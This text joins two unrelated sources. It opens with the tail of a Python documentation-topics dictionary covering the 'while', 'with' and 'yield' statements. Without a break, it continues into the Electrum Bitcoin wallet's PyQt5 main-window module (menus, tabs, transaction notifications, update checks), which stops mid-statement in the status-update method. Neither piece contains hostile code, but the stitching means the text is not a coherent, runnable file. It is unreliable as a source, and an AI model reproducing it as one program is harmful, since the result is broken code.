"-(x+1)". It only applies to integral numbers.\n\nIn all three cases, if the argument does not have the proper type, a\n"TypeError" exception is raised.\n', 'while': u'\nThe "while" statement\n*********************\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n', 'with': u'\nThe "with" statement\n********************\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'yield': u'\nThe "yield" statement\n*********************\n\n yield_stmt ::= yield_expression\n\nThe "yield" statement is only used when defining a generator function,\nand is only used in the body of the generator function. Using a\n"yield" statement in a function definition is sufficient to cause that\ndefinition to create a generator function instead of a normal\nfunction.\n\nWhen a generator function is called, it returns an iterator known as a\ngenerator iterator, or more commonly, a generator. The body of the\ngenerator function is executed by calling the generator\'s "next()"\nmethod repeatedly until it raises an exception.\n\nWhen a "yield" statement is executed, the state of the generator is\nfrozen and the value of "expression_list" is returned to "next()"\'s\ncaller. By "frozen" we mean that all local state is retained,\nincluding the current bindings of local variables, the instruction\npointer, and the internal evaluation stack: enough information is\nsaved so that the next time "next()" is invoked, the function can\nproceed exactly as if the "yield" statement were just another external\ncall.\n\nAs of Python version 2.5, the "yield" statement is now allowed in the\n"try" clause of a "try" ... "finally" construct. If the generator is\nnot resumed before it is finalized (by reaching a zero reference count\nor by being garbage collected), the generator-iterator\'s "close()"\nmethod will be called, allowing any pending "finally" clauses to\nexecute.\n\nFor full details of "yield" semantics, refer to the Yield expressions\nsection.\n\nNote: In Python 2.2, the "yield" statement was only allowed when the\n "generators" feature has been enabled. This "__future__" import\n statement was used to enable the feature:\n\n from __future__ import generators\n\nSee also:\n\n **PEP 0255** - Simple Generators\n The proposal for adding generators and the "yield" statement to\n Python.\n\n **PEP 0342** - Coroutines via Enhanced Generators\n The proposal that, among other generator enhancements, proposed\n allowing "yield" to appear inside a "try" ... "finally" block.\n'}
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import webbrowser import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar) import electrum from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum.plugin import run_hook from electrum.i18n import _ from electrum.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI) from electrum.transaction import Transaction, TxOutput from electrum.address_synchronizer import AddTransactionException from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum.version import ELECTRUM_VERSION from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.paymentrequest import PR_PAID from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field) from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 0)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = 